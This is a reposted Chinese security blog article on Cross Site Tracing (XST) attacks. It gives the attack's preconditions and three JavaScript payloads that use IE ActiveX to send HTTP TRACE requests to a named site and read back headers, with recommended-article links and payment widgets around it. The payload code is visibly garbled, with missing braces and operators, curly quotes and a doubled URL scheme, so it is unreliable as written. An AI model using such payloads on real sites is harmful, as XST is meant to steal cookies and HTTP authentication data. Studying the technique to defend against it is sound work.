Cross Site Tracing (XST) Attacks

最新推荐文章于 2023-01-17 22:00:00 发布
最新推荐文章于 2023-01-17 22:00:00 发布
阅读量3.7k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: javascript web服务 function 浏览器 flash java

转载自:http://forum.eviloctal.com/thread-12959-1-1.html

XST攻击属于XSS攻击的一种。

XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及htlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方; 
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:

<script type="text/javascript">  
<!--  
function xssTRACE(){  
var xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");  
xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);  
xmlHttp.send();  
xmlDoc=xmlHttp.responseText;  
alert(xmlDoc);  
 
//-->  
</script>  
<INPUT TYPE=BUTTON onClick="xssTRACE();" VALUE=’XSS TRACE’>


手法2: 

<script type="text/javascript">  
<!--  
function xssTRACE()  
var openWin=open("blank.htm","swords","width=500,height=400");  
var otraceswords=openWin.external;  
openWin.location.href="http://wmjie.51.net/swords/";  
setTimeout(  
function ()  
//以下必须写在一行  
otraceswords.NavigateAndFind
(’javascript:xmlHttp=new 
ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE","http://wmjie.51.net/swords/",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;alert("不用documents.cookie 
显示站点wmjie.51.net/swords/ 的头信息。\\n" xmlDoc);’,"","");  
},  
1024  
);  
 
//-->  
</script>  
<INPUT TYPE=BUTTON onClick="xssTRACE();" VALUE=’XSS TRACE’>

手法3: 

<script type="text/javascript">  
function xssTRACE(){  
var swords="var xmlHttp =new ActiveXObject(\"Microsoft.XMLHTTP\")\;
xmlHttp.open(\"TRACE\",\"http://http://www.tingh.com/\",false)\;
xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;";  
var target "http://wmjie.51.net/swords/";  
spinach encodeURIComponent(swords ’;top.close()’);  
var readyCode ’font-size:
expression_r(execScript(decodeURIComponent("’ spinach ’")))’;  
showModalDialog(target, null, readyCode);  
 
</script>  
<INPUT TYPE=BUTTON onClick="xssTRACE()" VALUE=’XSS TRACE’>

00M
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
古老的xst攻击
标子 的专栏
08-25 3076
xst主要是使用http的trace方法,该方法会返回浏览器发给服务器的所有请求信息,但该方法不能带body,主要是利于debug。 现在前端后端都做了很多xst攻击的措施,很难在浏览器端发起trace请求了,所以只能用fiddler模拟一下,服务器是wamp,支持trace方法。 该攻击主要是在网站存在xss漏洞但设置了cookie的httponly属性的时候结合trace方法进行攻击。如果
什么是跨站攻击
ellis2008的专栏
03-11 1666
<br />跨站攻击,即Cross Site Script Execution(通常简写为XSS)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。<br />业界对跨站攻击的定义如下:“跨站攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。”由于HTML语言允许使用脚本进行简单交互,
常见前端安全问题概述
bluemoon_0的博客
01-17 391
常见前端安全问题概述
什么是 XSS 攻击?XSS 攻击有哪几种类型?
SCUhzs
12-27 3818
作者:代码熬夜敲来源:SegmentFault 思否社区前言:网络安全攻击方式有很多种,其中包括XSS攻击、SQL注入攻击、URL篡改等。那么XSS攻击到底是什么?XSS攻击有哪几种类型?今天小编为大家讲解一下。什么是XSS攻击?XSS攻击又称为跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。XSS攻击有哪几种类型?常见的XSS攻击有三
Cross Site Tracing (XST) Attacks(跨站跟踪攻击)练习详细步骤(WebGoat5.4)
软件生命周期中的攻防博弈
08-28 2102
由于对web编程不是很熟悉,谨以此文分享给学习WebGoat但是web编程底子不好的小伙伴。 HTTP的Method中有专为调试Web Server连接的(TRACE/TRACK),但正式上线运行的WebServer如果支持Trace/Track方式,则一定存在跨站攻击漏洞。RFC 2616 for HTTP 如下定义 TRACE 方法,“此方法用于调用已请求消息的远程、应用层回送(
opentracing-api-0.33.0.jar
05-31
OpenTracing Java API io.opentracing/opentracing-api/0.33.0/opentracing-api-0.33.0.jar
opentracing-noop-0.33.0.jar
07-01
opentracing-api
java-jdbc:JDBC的OpenTracing工具
05-04
OpenTracing JDBC工具JDBC的OpenTracing工具。安装pom.xml < dependency> < groupId>io.opentracing.contrib</ groupId> < artifactId>opentracing-jdbc</ artifactId> < version>VERSION</ version></ dependency>...
TraceEventProgrammersGuide.rar_ETW_tracing
09-21
《.NET ETW Tracing 指南》 事件跟踪窗口(Event Tracing for Windows,简称ETW)是Windows操作系统中的一个强大日志记录机制,它允许开发者对应用程序进行低开销、高效率的诊断和性能分析。在.NET环境中,ETW与CLR...
Peter Shirley Ray Tracing系列合集
08-31
Peter Shirley Ray Tracing合集(包含Ray Tracing in One Weekend, Ray Tracing the Next Week, Ray Tracing The Rest of Your Life, Realistic Ray Tracing)
cross-site tracing XST攻击
xysoul的专栏
08-21 3408
XST攻击描述: 攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。 XST攻击条件: 1、需要目标web服务器允许Trace参数; 2、需要一个用来插入XST代码的地方;  3、
【35】WEB安全学习----XST攻击
尚未佩妥剑 转眼便江湖
10-09 2174
本章为知识扩充部分,此攻击现浏览器已不支持发送TRACE请求,故只需要了解攻击原理即可。 XST攻击原理 "Cross-Site-Tracing"简称为XST,如果开发者在设置cookie属性时配置了httponly属性,那么通过XSS攻击就无法读取cookie数据,那么如果服务器支持TRACE请求并且允许跨域的话,那么还是可以读取到cookie数据的。 要想理解XST攻击,首先需要了解以下...
浅谈“跨站跟踪攻击(即CST/XST攻击)”
→_→
05-23 1779
漏洞名称: Cross-Site-Tracing"简称为 CST / XST-跨站式追踪攻击 描述: 攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。 检测条件: 需要目标 Web 服务器允许接受 Trace、Track 方法的请求。 客户端可以发送 Trace、Track..
WebGoat学习笔记(六)——Cross Site Tracing(XST) Attacks
走走停停
11-18 1356
JS Post Url
XSS攻击原理和解决方法
芦金宇的专栏
09-23 1206
概述 XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。 ...
bWAPP(A4&A5)
qq_39670065的博客
08-16 742
A4 - Insecure Direct Object References 不安全的直接对象引用Insecure DOR (Change Secret)Insecure DOR (Reset Secret)Insecure DOR (Order Tickets)Arbitrary File Access (Samba)Cross-Domain Policy File (Flash)Cross-Origin Resource Sharing (AJAX)Cross-Site Tracing (XST)Den
bwapp通关(全完结)
11-16 587
bwapp
web渗透--26--服务器端包含注入(SSI注入)
武天旭的博客
09-16 2785
1、漏洞描述: Web服务器通常允许开发人员在静态HTML页面内嵌入少量的动态代码,而无需处理全部的服务器端或客户端语言。这个特征称作:服务器端包含(SSI)。在SSI注入测试中,我们测试能否注入可由SSI机制解释的应用程序数据。该漏洞的成功利用允许攻击者在HTML页面中插入代码,甚至实施远程代码执行。
Ray Tracing
最新发布
06-05
Ray Tracing(光线追踪)是一种在计算机图形学中使用的技术,用于生成高度逼真的图像。它通过跟踪光线从视点开始的路径,来模拟光在场景中的运动,计算出光线与物体的交点以及光线在经过物体时的反射、折射等效果,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值